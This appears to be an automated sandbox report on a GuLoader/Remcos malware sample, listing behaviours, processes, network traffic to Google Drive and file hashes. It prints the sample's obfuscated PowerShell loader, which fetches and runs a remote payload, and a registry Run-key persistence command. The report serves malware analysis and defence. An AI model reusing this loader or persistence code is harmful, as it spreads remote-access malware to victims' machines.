Malware Analysis Report

2025-01-02 03:20

Sample ID 240402-lz5y2ade8s
Target 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.zip
SHA256 f5e9a12645109faa38afb7b1784f96a6355386098b83cc28fe166e36d2e707f4
Tags guloader remcos remotehost downloader persistence rat
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 f5e9a12645109faa38afb7b1784f96a6355386098b83cc28fe166e36d2e707f4

Threat Level: Known bad

The file 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.zip was found to be: Known bad.

Malicious Activity Summary

guloader remcos remotehost downloader persistence rat

Guloader, Cloudeye

Remcos

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 09:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 09:59

Reported

2024-04-02 10:01

Platform

win7-20240221-en

Max time kernel

118s

Max time network

125s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Guloader, Cloudeye

downloader guloader

Remcos

rat remcos

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" | C:\Windows\SysWOW64\reg.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 276 set thread context of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2876 wrote to memory of 1104 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 1104 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 1104 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 676 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 676 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 676 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 276 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 276 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 276 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 276 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 276 wrote to memory of 1480 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1480 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1480 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1480 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 276 wrote to memory of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 276 wrote to memory of 1860 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1860 wrote to memory of 1524 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 1860 wrote to memory of 1524 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 1860 wrote to memory of 1524 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 1860 wrote to memory of 1524 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 1524 wrote to memory of 2540 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 1524 wrote to memory of 2540 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 1524 wrote to memory of 2540 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 1524 wrote to memory of 2540 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.187.206:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 142.250.178.1:443 | drive.usercontent.google.com | tcp
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.187.206:443 | drive.google.com | tcp
GB | 142.250.178.1:443 | drive.usercontent.google.com | tcp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 7b4fdea2a0af3dbb3e9af46780e69650
SHA1 de69a8afb30d505ddd396ef3a4e8a1f29a433365
SHA256 6b1fa76d82599968c89764e75052e8d79e5dd4b1b161729424cdc987c5c63b7b
SHA512 191950acaceeced7a8ad35f7c4e825e709088942b59b2d118b1b1b57fab6428a0247fe5528bcd55e5f2ec8fb64eb153152458db69f894c93a692bc42fe0f7820

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 114a16150326060e22136b52754269d6
SHA1 9922af44d5ae3aad88e7142110b374d62b1e286e
SHA256 430d09dee4de6ed578860cb29ce7bc18aa71cb3d7ecc3b74f6c34b018fbed64a
SHA512 10fcd67bfeaf39bc099ec43688c58c168067ea6690bf40ecf3163745ac9b3829b2a1f3075151580ee4d9162e41d0eb6114687a9a63aaff0ffbc5217306a9e232

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 ce31aad931645728cb11543a9cd80f8e
SHA1 3e04faa0eebb25e42df967a276d3ce916947adf9
SHA256 5e765d9805803b5190ecf3cb07505d8ddc2b45645240c0ce905ecbda3e46ab06
SHA512 07e2f610945bac67ded6f43b0422295fe5803aeb91b6e4208350bb197f27ee73340462969917e883e3a3aac60a34eb5c779802d9223b04b11010e761c198e5e7

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 c3b48e90f811fd16ef69026fdc4a2e50
SHA1 df10a00a6d68af91801d446d669b46e69fe8cc56
SHA256 4ebcc3f20194ee869ed413b7bbe7fc466ddced60b792e09b9ec70b906984ff0f
SHA512 7b6751535b2d2237d207236327f64f5281f02f2b70d08abc3a71f30ba4e0520f6f794eb275e75d7b1babf153d9d528eadf2ab07d1616fad17792ada0c2c53eda

memory/1104-261-0x000000001B810000-0x000000001BAF2000-memory.dmp

memory/1104-263-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1104-262-0x0000000000300000-0x0000000000308000-memory.dmp

memory/1104-264-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-265-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-266-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-267-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1104-268-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-269-0x0000000002980000-0x00000000029A2000-memory.dmp

memory/1104-270-0x00000000022A0000-0x00000000022B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7ENQ859Z3E8CFSKT0PHQ.temp

MD5 938d11d152f7becaf03cc896662552e9
SHA1 7e4aff6bbc098c29f3df3330cf3fc5beb4d802af
SHA256 3bb781cfc9ce56808126b84acca7d4df37f287b5d9981650ffdc7a6c5bc117d5
SHA512 56c5fe221ceb2d97a84a830d7001877b9bbba8cd345709ba992c201908cc70f58144640c2429a8afe257c52d569a3e42d411ce2fc092711c62343ffad25eb1b0

memory/276-273-0x0000000073C20000-0x00000000741CB000-memory.dmp

memory/276-274-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

memory/276-275-0x0000000073C20000-0x00000000741CB000-memory.dmp

memory/276-276-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab447F.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f5ce70305a47d6a1e13d1fad04b92a29
SHA1 f806975d9555a6cf7b212339da5e41d2182d6f29
SHA256 f5f402b6d27bbd2511ac609c34f92198ff0bd77a9f599f7b7ad721b62fc60f2c
